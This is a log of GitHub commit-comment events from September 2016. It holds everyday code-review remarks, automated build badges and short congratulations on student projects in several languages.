{"id":"4548306620","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"mbootsector/Stockfish"},"payload":{"comment":{"id":18982113,"position":null,"line":null,"path":null,"commit_id":"afbe6ac597dfb2bb7ce9203e62b7ed637bd7a935","created_at":"2016-09-12T09:44:56Z","updated_at":"2016-09-12T09:44:56Z","body":"Instead of LTC do you think it makes sense to run with no hash pressure? I suspect your local tests were not run with 4mb hash and i think this patch will perform better with no hash pressure because qsearch will search more nodes. I could be wrong though..."}},"created_at":"2016-09-12T09:44:56Z"}
{"id":"4548319459","type":"CommitCommentEvent","actor":{"login":"Gensun"},"repo":{"name":"Gensun/Resume"},"payload":{"comment":{"id":18982143,"position":null,"line":null,"path":null,"commit_id":"149301a550d1a89d5c691b71e61fcc1ff976303f","created_at":"2016-09-12T09:47:42Z","updated_at":"2016-09-12T09:47:42Z","body":"dc"}},"created_at":"2016-09-12T09:47:42Z"}
{"id":"4548320824","type":"CommitCommentEvent","actor":{"login":"macite"},"repo":{"name":"splashkit/splashkit-translator"},"payload":{"comment":{"id":18982146,"position":6,"line":316,"path":"src/parser.rb","commit_id":"d952ff850f26716be8e9981baeaa02af52ab0e2a","created_at":"2016-09-12T09:48:00Z","updated_at":"2016-09-12T09:48:00Z","body":"Happy for you to update this :)\r\nI'll make a pull request once it is all finished."}},"created_at":"2016-09-12T09:48:00Z"}
{"id":"4548327386","type":"CommitCommentEvent","actor":{"login":"aziouk"},"repo":{"name":"aziouk/obsceneredundancy"},"payload":{"comment":{"id":18982153,"position":null,"line":null,"path":null,"commit_id":"167e00c00cdb57b1932a49f9ecac4939f7cc8e48","created_at":"2016-09-12T09:49:25Z","updated_at":"2016-09-12T09:49:25Z","body":"Fixing a bug in the makeconfig.sh swiftly configurator. I think it may have been fixed before, and was forgotten to be committed, but it's working again nicely now!"}},"created_at":"2016-09-12T09:49:25Z"}
{"id":"4548329912","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18982156,"position":11,"line":11,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T09:49:58Z","updated_at":"2016-09-12T09:49:58Z","body":"Не совсем верная структура получилась -  сначала у вас идет верхний блок - информативно-функциональный (логотип, поле поиска, закладки, корзина, кнопка) его стоит выделить отдельно,  затем идет вторая часть хедера - в нем тоже будет два блока - один с информацией второй с меню. Не забудьте сразу обозначить центрирующий блок внутри каждого большого блока. Я вам расчертила header, посмотрите  - http://joxi.ru/bmoxM9vfMDPxE2 . И я вам настоятельно рекомендую расчертить себе также остальную страницу - нужно научиться визуально разделять макет на блоки - тогда меньше будет ошибок, тем более что Техномарт - не самый простой макет. "}},"created_at":"2016-09-12T09:49:58Z"}
{"id":"4548333718","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18982169,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T09:50:48Z","updated_at":"2016-09-12T09:50:48Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%282/2%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-7.16%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1785%20/%208398%20%2821.26%20%25%29-yellow.svg)](#)\n"}},"created_at":"2016-09-12T09:50:48Z"}
{"id":"4548333868","type":"CommitCommentEvent","actor":{"login":"ndown"},"repo":{"name":"SAP/openui5"},"payload":{"comment":{"id":18982171,"position":null,"line":null,"path":null,"commit_id":"348cdf88e51b0401c178d71d0756700ba479d37e","created_at":"2016-09-12T09:50:50Z","updated_at":"2016-09-12T09:50:50Z","body":"@goligo of course, and maybe I am thinking wrong, but I think it shouldnt be up to the programmer to return a 0 value but sort deeply by default... I mean, why should someone define more than one sorter if he doesnt want to sort deeply anyway? Maybe I am forgetting about a usecase here."}},"created_at":"2016-09-12T09:50:50Z"}
{"id":"4548336815","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18982187,"position":24,"line":24,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T09:51:30Z","updated_at":"2016-09-12T09:51:30Z","body":"Не очень поняла что это за разметка) это class потерялся или это коммент неудачный? "}},"created_at":"2016-09-12T09:51:30Z"}
{"id":"4548340000","type":"CommitCommentEvent","actor":{"login":"mfenner"},"repo":{"name":"crosscite/doi-metadata-search"},"payload":{"comment":{"id":18982198,"position":2,"line":2,"path":"views/cite_box.haml","commit_id":"683ae2fc2fb26abb102c03ed94cd5d7599497e13","created_at":"2016-09-12T09:52:15Z","updated_at":"2016-09-12T09:52:15Z","body":"Why is clipboard both in `package.json` and loaded via CDN?"}},"created_at":"2016-09-12T09:52:15Z"}
{"id":"4548342444","type":"CommitCommentEvent","actor":{"login":"shangboyang"},"repo":{"name":"nieyulin112/interview"},"payload":{"comment":{"id":18982203,"position":null,"line":null,"path":null,"commit_id":"a64eadf8a41f5773e748262f13dcf8524644bf1e","created_at":"2016-09-12T09:52:47Z","updated_at":"2016-09-12T09:52:47Z","body":"小伙很勤奋么~"}},"created_at":"2016-09-12T09:52:47Z"}
{"id":"4548343124","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18982204,"position":62,"line":124,"path":"tech/languages/python/micropython.md","commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-12T09:52:57Z","updated_at":"2016-09-12T09:52:57Z","body":"@hroncok, how are permissions handled for 3D printing? Is there something simpler we could do than sudo or dialout?"}},"created_at":"2016-09-12T09:52:57Z"}
{"id":"4548343779","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18982205,"position":43,"line":43,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T09:53:06Z","updated_at":"2016-09-12T09:53:06Z","body":"Не очень поняла что это за разметка) это class потерялся или это коммент неудачный?"}},"created_at":"2016-09-12T09:53:06Z"}
{"id":"4548344434","type":"CommitCommentEvent","actor":{"login":"justinmk"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18982207,"position":24,"line":2362,"path":"src/nvim/normal.c","commit_id":"c6f5d6b7e0f274a245cecd80c480212d399df9d4","created_at":"2016-09-12T09:53:13Z","updated_at":"2016-09-12T09:53:13Z","body":"Dragging a worked fine for me in every way I could test, using iterm2. What's the problem?"}},"created_at":"2016-09-12T09:53:13Z"}
{"id":"4548347158","type":"CommitCommentEvent","actor":{"login":"jakoch"},"repo":{"name":"Froxlor/Froxlor"},"payload":{"comment":{"id":18982218,"position":11,"line":3445,"path":"install/updates/froxlor/0.9/update_0.9.inc.php","commit_id":"4229d8dda4b24b1ba077a602e4aa8420f9e4e521","created_at":"2016-09-12T09:53:49Z","updated_at":"2016-09-12T09:53:49Z","body":"ich würde statt `acme.conf` den filename `letsencrypt.conf` vorschlagen"}},"created_at":"2016-09-12T09:53:49Z"}
{"id":"4548347192","type":"CommitCommentEvent","actor":{"login":"jf-simon"},"repo":{"name":"osmandapp/Osmand"},"payload":{"comment":{"id":18982219,"position":null,"line":null,"path":null,"commit_id":"e3ccf71aade0904455178b630325061c85f21e7b","created_at":"2016-09-12T09:53:50Z","updated_at":"2016-09-12T09:53:50Z","body":"Oh ok, I'm sorry"}},"created_at":"2016-09-12T09:53:50Z"}
{"id":"4548348735","type":"CommitCommentEvent","actor":{"login":"TecSeguridad"},"repo":{"name":"vitalidze/traccar-web"},"payload":{"comment":{"id":18982223,"position":null,"line":null,"path":null,"commit_id":"7a5196abd5c29fa3f4ad761a58c2c4e7d625507f","created_at":"2016-09-12T09:54:12Z","updated_at":"2016-09-12T09:54:12Z","body":"Yes you are absolutely right, but i did it again correctly and get :[ERROR] ]] failed with status 137\r\n[ERROR] -> [Help 1]\r\n[ERROR]\r\n[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.\r\n[ERROR] Re-run Maven using the -X switch to enable full debug logging.\r\n[ERROR]\r\n[ERROR] For more information about the errors and possible solutions, please read the following articles:\r\n[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException\r\n\r\nIm installing Java in windows to try it so.\r\n\r\nIts is posible to download a traccar-web.war file with the #822 issue already fixed. Thank you\r\n"}},"created_at":"2016-09-12T09:54:12Z"}
{"id":"4548352887","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18982233,"position":25,"line":25,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T09:55:05Z","updated_at":"2016-09-12T09:55:05Z","body":"этот список не нужен - вы когда прочитаете выше комментарий про структуру - переделайте как там написано."}},"created_at":"2016-09-12T09:55:05Z"}
{"id":"4548358473","type":"CommitCommentEvent","actor":{"login":"ygopee"},"repo":{"name":"moniquemendy/monProjet"},"payload":{"comment":{"id":18982242,"position":null,"line":null,"path":null,"commit_id":"aa93a9a587d9d4f21490eec0db0b7d5e67c2f753","created_at":"2016-09-12T09:56:17Z","updated_at":"2016-09-12T09:56:17Z","body":"c'est super ! @moniquemendy "}},"created_at":"2016-09-12T09:56:17Z"}
{"id":"4548358923","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":18982243,"position":70,"line":70,"path":"catalog.html","commit_id":"78ccc258634a890744da9665bf3c3ffda9292468","created_at":"2016-09-12T09:56:24Z","updated_at":"2016-09-12T09:56:24Z","body":"хлебные крошки всегда имеют внутри li еще и ссылку - ведь эти пункты для того и присутствуют чтобы можно было быстро перейти в нужные раздел - а как это сделать без ссылки? НО! Последний пункт меню как раз не должен быть ссылкой"}},"created_at":"2016-09-12T09:56:24Z"}
{"id":"4548359114","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18982244,"position":141,"line":199,"path":"tech/languages/python/micropython.md","commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-12T09:56:26Z","updated_at":"2016-09-12T09:56:26Z","body":"If you don't see the last line, press *Enter* on your keyboard. If you still don't see the prompt, press RESET on your device."}},"created_at":"2016-09-12T09:56:26Z"}
{"id":"4548359553","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/dnf"},"payload":{"comment":{"id":18982246,"position":5,"line":523,"path":"dnf/conf/config.py","commit_id":"185b4f126a749cad9b167da41c63380b3ed683e6","created_at":"2016-09-12T09:56:32Z","updated_at":"2016-09-12T09:56:32Z","body":"no trailing whitespace"}},"created_at":"2016-09-12T09:56:32Z"}
{"id":"4548362841","type":"CommitCommentEvent","actor":{"login":"RadekSowa"},"repo":{"name":"TomWolff93/MyProject"},"payload":{"comment":{"id":18982251,"position":null,"line":null,"path":null,"commit_id":"1d09dae746fe918b8674d7ad8eeee7f10f51848e","created_at":"2016-09-12T09:57:16Z","updated_at":"2016-09-12T09:57:16Z","body":"wow ! RIEN ! c'est trop original ^^"}},"created_at":"2016-09-12T09:57:16Z"}
{"id":"4548363298","type":"CommitCommentEvent","actor":{"login":"Kunaragi"},"repo":{"name":"RadekSowa/Projecto-TESTO"},"payload":{"comment":{"id":18982254,"position":null,"line":null,"path":null,"commit_id":"589941fa4d285481ebfa257b178c2e1318ffbf32","created_at":"2016-09-12T09:57:22Z","updated_at":"2016-09-12T09:57:22Z","body":"L'alcool, c'est de l'eau."}},"created_at":"2016-09-12T09:57:22Z"}
{"id":"4548365169","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18982259,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T09:57:49Z","updated_at":"2016-09-12T09:57:49Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%282/2%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-7.16%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1785%20/%208398%20%2821.26%20%25%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc-coverage-13.96%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-12T09:57:49Z"}
{"id":"4548367234","type":"CommitCommentEvent","actor":{"login":"ygopee"},"repo":{"name":"pariseddy/Montwitter"},"payload":{"comment":{"id":18982264,"position":null,"line":null,"path":null,"commit_id":"269155f41148981e7998497d51ed0459aafad9bd","created_at":"2016-09-12T09:58:17Z","updated_at":"2016-09-12T09:58:17Z","body":"c'est super !!! felicitations @pariseddy "}},"created_at":"2016-09-12T09:58:17Z"}
{"id":"4548367949","type":"CommitCommentEvent","actor":{"login":"RIMSIG"},"repo":{"name":"moniquemendy/monProjet"},"payload":{"comment":{"id":18982273,"position":null,"line":null,"path":null,"commit_id":"aa93a9a587d9d4f21490eec0db0b7d5e67c2f753","created_at":"2016-09-12T09:58:26Z","updated_at":"2016-09-12T09:58:26Z","body":"@moniquemendy monique tu as bien progressé , Auguste est fière de toi !\r\n\r\n"}},"created_at":"2016-09-12T09:58:26Z"}
{"id":"4548369161","type":"CommitCommentEvent","actor":{"login":"TomWolff93"},"repo":{"name":"Kunaragi/MyProject"},"payload":{"comment":{"id":18982277,"position":null,"line":null,"path":null,"commit_id":"7bd70e4d60b40a1ebc0704c902cd0adbbd9197bd","created_at":"2016-09-12T09:58:41Z","updated_at":"2016-09-12T09:58:41Z","body":"Très beau projet, continue dans ce sens"}},"created_at":"2016-09-12T09:58:41Z"}
{"id":"4548369321","type":"CommitCommentEvent","actor":{"login":"ygopee"},"repo":{"name":"Arod-11/MonProjet"},"payload":{"comment":{"id":18982278,"position":null,"line":null,"path":null,"commit_id":"0c31fd27fad14ba26b829adfb32a3896f061a61d","created_at":"2016-09-12T09:58:44Z","updated_at":"2016-09-12T09:58:44Z","body":"super !!! felicitations @Arod-11 "}},"created_at":"2016-09-12T09:58:44Z"}
{"id":"4548369762","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18982279,"position":62,"line":124,"path":"tech/languages/python/micropython.md","commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-12T09:58:49Z","updated_at":"2016-09-12T09:58:49Z","body":"Look at 3dprinter-udev-rules package. We could make something similar.\nHowever people say it's not that safe. For that it's a good idea to reply\nwith https://xkcd.com/1200/\n"}},"created_at":"2016-09-12T09:58:49Z"}
{"id":"4548370348","type":"CommitCommentEvent","actor":{"login":"moniquemendy"},"repo":{"name":"RIMSIG/Mon-projet-"},"payload":{"comment":{"id":18982280,"position":null,"line":null,"path":null,"commit_id":"31ecee3276366b205aada1928f82e6c687ef3e6b","created_at":"2016-09-12T09:58:56Z","updated_at":"2016-09-12T09:58:56Z","body":"rim bravo pour ton travail @RIMSIG !"}},"created_at":"2016-09-12T09:58:56Z"}
{"id":"4548370882","type":"CommitCommentEvent","actor":{"login":"Kunaragi"},"repo":{"name":"TomWolff93/MyProject"},"payload":{"comment":{"id":18982282,"position":null,"line":null,"path":null,"commit_id":"1d09dae746fe918b8674d7ad8eeee7f10f51848e","created_at":"2016-09-12T09:59:03Z","updated_at":"2016-09-12T09:59:03Z","body":"This not what I request to you.\r\nYou're Fired @TomWolff93 \r\nBut I want to hire you @RadekSowa "}},"created_at":"2016-09-12T09:59:03Z"}
{"id":"4548371382","type":"CommitCommentEvent","actor":{"login":"ygopee"},"repo":{"name":"RIMSIG/Mon-projet-"},"payload":{"comment":{"id":18982285,"position":null,"line":null,"path":null,"commit_id":"31ecee3276366b205aada1928f82e6c687ef3e6b","created_at":"2016-09-12T09:59:10Z","updated_at":"2016-09-12T09:59:10Z","body":"super !!! felicitations @RIMSIG "}},"created_at":"2016-09-12T09:59:10Z"}
{"id":"4548371735","type":"CommitCommentEvent","actor":{"login":"TomWolff93"},"repo":{"name":"RadekSowa/Projecto-TESTO"},"payload":{"comment":{"id":18982286,"position":null,"line":null,"path":null,"commit_id":"589941fa4d285481ebfa257b178c2e1318ffbf32","created_at":"2016-09-12T09:59:14Z","updated_at":"2016-09-12T09:59:14Z","body":"Très beau projet, continue dans ce sens\r\n"}},"created_at":"2016-09-12T09:59:14Z"}
{"id":"4548372877","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18982289,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T09:59:28Z","updated_at":"2016-09-12T09:59:28Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%282/2%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-7.16%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1785%20/%208398%20%2821.26%20%25%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc_coverage-13.96%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-12T09:59:28Z"}
{"id":"4548373524","type":"CommitCommentEvent","actor":{"login":"ygopee"},"repo":{"name":"TomWolff93/MyProject"},"payload":{"comment":{"id":18982291,"position":null,"line":null,"path":null,"commit_id":"1d09dae746fe918b8674d7ad8eeee7f10f51848e","created_at":"2016-09-12T09:59:36Z","updated_at":"2016-09-12T09:59:36Z","body":"tellement bien !!! @TomWolff93 "}},"created_at":"2016-09-12T09:59:36Z"}
{"id":"4548373605","type":"CommitCommentEvent","actor":{"login":"Turing1887"},"repo":{"name":"veritasfugit/coppercup"},"payload":{"comment":{"id":18982292,"position":null,"line":null,"path":null,"commit_id":"a3f4bf7e89749379ab4ec45605502dfd4974394d","created_at":"2016-09-12T09:59:37Z","updated_at":"2016-09-12T09:59:37Z","body":"Ich drück die Daumen, dass er vielleicht mal jemanden bestehen lässt beim nächsten Projekt. "}},"created_at":"2016-09-12T09:59:37Z"}
{"id":"4548374212","type":"CommitCommentEvent","actor":{"login":"TomWolff93"},"repo":{"name":"ygopee/yohan_project"},"payload":{"comment":{"id":18982299,"position":null,"line":null,"path":null,"commit_id":"d68674bc9d85a2050a67ea9de8d282c3235e2668","created_at":"2016-09-12T09:59:45Z","updated_at":"2016-09-12T09:59:45Z","body":"Très beau projet, continue dans ce sens\r\n"}},"created_at":"2016-09-12T09:59:45Z"}
{"id":"4552647941","type":"CommitCommentEvent","actor":{"login":"Fsu0413"},"repo":{"name":"lwtmusou/touhoukill"},"payload":{"comment":{"id":18993953,"position":null,"line":null,"path":null,"commit_id":"46f66733702058ebe9ca50340ad69997607ec3d2","created_at":"2016-09-13T00:00:21Z","updated_at":"2016-09-13T00:00:21Z","body":"饼美说要移除？"}},"created_at":"2016-09-13T00:00:21Z"}
{"id":"4552651619","type":"CommitCommentEvent","actor":{"login":"behlendorf"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18993963,"position":4,"line":44,"path":"README.md","commit_id":"42ce0e0fb17a25002b6bd2dee07a1ab1c4311040","created_at":"2016-09-13T00:01:19Z","updated_at":"2016-09-13T00:01:19Z","body":"You might want to rephrase this slight.  How about, \"By default all commits in your ZFS pull request are compiled by the BUILD builders.\""}},"created_at":"2016-09-13T00:01:19Z"}
{"id":"4552653623","type":"CommitCommentEvent","actor":{"login":"Fsu0413"},"repo":{"name":"lwtmusou/touhoukill"},"payload":{"comment":{"id":18993968,"position":9,"line":134,"path":"src/package/thndj.cpp","commit_id":"84bb74690d9ce5e136e2b9fa2a2b51fe883376ca","created_at":"2016-09-13T00:01:57Z","updated_at":"2016-09-13T00:01:57Z","body":"错了。。。。如果是非武器牌，那么第二个参数始终是target，第三个参数应该是mokou == target ? NULL : mokou"}},"created_at":"2016-09-13T00:01:57Z"}
{"id":"4552654225","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18993970,"position":null,"line":null,"path":null,"commit_id":"8937b558a7facd6c558772547cfb172a062e4057","created_at":"2016-09-13T00:02:08Z","updated_at":"2016-09-13T00:02:08Z","body":"@MichaelWallace30 \r\nUnless UGV and AUV upgrade their Visual Studio to 2015, I can't add lambda expressions. The next version of CommProtocol will **REQUIRE** them to."}},"created_at":"2016-09-13T00:02:08Z"}
{"id":"4552654246","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18993971,"position":25,"line":43,"path":"main/inc/lib/agenda.lib.php","commit_id":"d4b374eef70bc5d8254eab4c49e51172200df2a2","created_at":"2016-09-13T00:02:08Z","updated_at":"2016-09-13T00:02:08Z","body":"I thought this form of ?: was only valid after PHP 5.4 but I checked the documentation and it's OK since PHP 5.3. Good!\r\nhttp://php.net/ternary"}},"created_at":"2016-09-13T00:02:08Z"}
{"id":"4552654770","type":"CommitCommentEvent","actor":{"login":"blakedy"},"repo":{"name":"shinjonathan/jesque"},"payload":{"comment":{"id":18993973,"position":16,"line":270,"path":"src/main/java/net/greghaines/jesque/client/AbstractClient.java","commit_id":"fb141c9499a8b2226dd79c6cc6ba5ad0ce75fdc7","created_at":"2016-09-13T00:02:17Z","updated_at":"2016-09-13T00:02:17Z","body":"`\"timestamp\"` is `\"timestamps\"` in https://github.com/resque/resque-scheduler/blob/master/lib/resque/scheduler/delaying_extensions.rb#L69"}},"created_at":"2016-09-13T00:02:17Z"}
{"id":"4552658142","type":"CommitCommentEvent","actor":{"login":"blakedy"},"repo":{"name":"shinjonathan/jesque"},"payload":{"comment":{"id":18993982,"position":23,"line":277,"path":"src/main/java/net/greghaines/jesque/client/AbstractClient.java","commit_id":"fb141c9499a8b2226dd79c6cc6ba5ad0ce75fdc7","created_at":"2016-09-13T00:03:17Z","updated_at":"2016-09-13T00:03:17Z","body":"last 2 arguments both should be integers via https://github.com/resque/resque-scheduler/blob/master/lib/resque/scheduler/delaying_extensions.rb#L74"}},"created_at":"2016-09-13T00:03:17Z"}
{"id":"4552661060","type":"CommitCommentEvent","actor":{"login":"blakedy"},"repo":{"name":"shinjonathan/jesque"},"payload":{"comment":{"id":18993994,"position":22,"line":276,"path":"src/main/java/net/greghaines/jesque/client/AbstractClient.java","commit_id":"fb141c9499a8b2226dd79c6cc6ba5ad0ce75fdc7","created_at":"2016-09-13T00:04:07Z","updated_at":"2016-09-13T00:04:07Z","body":"the second argument is `delayKey`"}},"created_at":"2016-09-13T00:04:07Z"}
{"id":"4552662053","type":"CommitCommentEvent","actor":{"login":"romainfrancois"},"repo":{"name":"ThinkRstat/tipixel"},"payload":{"comment":{"id":18993999,"position":null,"line":null,"path":null,"commit_id":"5a0b69bb39ab30ca2f9f184d5b5c57d3f612f8dd","created_at":"2016-09-13T00:04:23Z","updated_at":"2016-09-13T00:04:23Z","body":"```\r\n> n <- 200*200\r\n> X <- data.frame( R = runif(n),  G = runif(n),  B = runif(n) )\r\n> Y <- data.frame( R = runif(50), G = runif(50), B = runif(50) )\r\n> system.time( closest_rgb( X, Y) )\r\n   user  system elapsed \r\n  0.018   0.000   0.002 \r\n> Y <- t(as.matrix(Y))\r\n> system.time({\r\n+   dist <- mondist_global(X, Y)\r\n+   sapply(as.data.frame(t(dist)), which.min)\r\n+ })\r\n   user  system elapsed \r\n 12.566   0.069  12.632 \r\n> 12.632 / 0.002\r\n[1] 6316\r\n```\r\n"}},"created_at":"2016-09-13T00:04:23Z"}
{"id":"4552662819","type":"CommitCommentEvent","actor":{"login":"behlendorf"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18994001,"position":8,"line":48,"path":"README.md","commit_id":"42ce0e0fb17a25002b6bd2dee07a1ab1c4311040","created_at":"2016-09-13T00:04:37Z","updated_at":"2016-09-13T00:04:37Z","body":"Maybe be explicit here and say `comma separated options`, even if we're going to be more permissive than that.\r\n\r\nI'd also suggest the making Requires-builders syntax explicit, `Requires-builders: <build|test|perf>`"}},"created_at":"2016-09-13T00:04:37Z"}
{"id":"4552667077","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":18994009,"position":null,"line":null,"path":null,"commit_id":"9d4cb57b9cbd14ed9be8097fe41a77d5a488d9f5","created_at":"2016-09-13T00:05:46Z","updated_at":"2016-09-13T00:05:46Z","body":"I think I've fixed up DFS in my experiment-freeze  branch, but I'm not\nconvinced I haven't broken something there with respect to strongly\nconnected component finding. I tried to implement a generalization of the\nconcept to bidirected graphs from a very notation-heavy 1996 math paper\nthat I can't say I really understood.\n\nOn Sep 12, 2016 2:46 PM, \"Erik Garrison\" <notifications@github.com> wrote:\n\nYeah this looks like a problem. Sorry I thought I had dealt with it but\ndidn't loop back to deal with it as there had been only one thing using\nthis function until recently.\n\nYou can turn the unrolling code on by default to work around this. I will\nlook into fixing the DFS stuff tomorrow.\n\nOn Mon, Sep 12, 2016, 23:22 adamnovak <notifications@github.com> wrote:\n\n> @ekg <https://github.com/ekg> what does a DFS mean on Node*s and not\n> NodeTraversals? This looks to be just following all the edges in a\n> from->to direction, irrespective of whether those edges are actually\n> attached to the start or end of the node. So you can start at a node and\n> eventually reach nodes that you can't thread a proper\n> alternating-nodes-and-edges path to.\n>\n> There's also the case where a node that is topologically upstream gets\n> visited later, because the root loop got to one of its children first.\n>\n> I think this dfs thing is the root cause of a problem I'm having with\n> is_acyclic, where it thinks that a graph with a cycle between two nodes of\n> a normal from->to edge and a from_start, to_end edge is acyclic, depending\n> on the ID order of the nodes.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/vgteam/vg/commit/9d4cb57b9cbd14ed9be8097fe41a77\nd5a488d9f5#commitcomment-18991885>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/\nAAI4EfojhYYl1ZY9aDV9zAzKD59f3mg1ks5qpcKNgaJpZM4J7C69>\n> .\n>\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub\n<https://github.com/vgteam/vg/commit/9d4cb57b9cbd14ed9be8097fe41a77d5a488d9f5#commitcomment-18992244>,\nor mute the thread\n<https://github.com/notifications/unsubscribe-auth/AE0_XyUOYDuxL6s5oOprX3-DNL1f30fhks5qpcg1gaJpZM4J7C69>\n.\n"}},"created_at":"2016-09-13T00:05:46Z"}
{"id":"4552671584","type":"CommitCommentEvent","actor":{"login":"zouxiaokaiqiang"},"repo":{"name":"zouxiaokaiqiang/Test1"},"payload":{"comment":{"id":18994028,"position":null,"line":null,"path":null,"commit_id":"b25b73a3c6ae9fcc6844c5cc8c5e6bef5a654ca2","created_at":"2016-09-13T00:07:11Z","updated_at":"2016-09-13T00:07:11Z","body":"修改跳转到成功页面"}},"created_at":"2016-09-13T00:07:11Z"}
{"id":"4552671613","type":"CommitCommentEvent","actor":{"login":"smlee729"},"repo":{"name":"DataDog/java-dogstatsd-client"},"payload":{"comment":{"id":18994029,"position":null,"line":null,"path":null,"commit_id":"37fbddf3657e6cb70148d1235cb9c95130fc1d8b","created_at":"2016-09-13T00:07:11Z","updated_at":"2016-09-13T00:07:11Z","body":"Hi, When this commit would be deployed through maven?"}},"created_at":"2016-09-13T00:07:11Z"}
{"id":"4552673944","type":"CommitCommentEvent","actor":{"login":"smlee729"},"repo":{"name":"DataDog/java-dogstatsd-client"},"payload":{"comment":{"id":18994037,"position":null,"line":null,"path":null,"commit_id":"37fbddf3657e6cb70148d1235cb9c95130fc1d8b","created_at":"2016-09-13T00:07:51Z","updated_at":"2016-09-13T00:07:51Z","body":"Do you have any default sample rate when we don't use explicit sample rate?"}},"created_at":"2016-09-13T00:07:51Z"}
{"id":"4552674670","type":"CommitCommentEvent","actor":{"login":"shinjonathan"},"repo":{"name":"shinjonathan/jesque"},"payload":{"comment":{"id":18994039,"position":22,"line":276,"path":"src/main/java/net/greghaines/jesque/client/AbstractClient.java","commit_id":"fb141c9499a8b2226dd79c6cc6ba5ad0ce75fdc7","created_at":"2016-09-13T00:08:06Z","updated_at":"2016-09-13T00:08:06Z","body":"it's actually not delayKey. delayKey creates \"resque:delayed:timeToRun\"\r\n\r\nI could pass it through JesqueUtils.createKey(\"delayed\", timeToRun); if you think that would be more elegant"}},"created_at":"2016-09-13T00:08:06Z"}
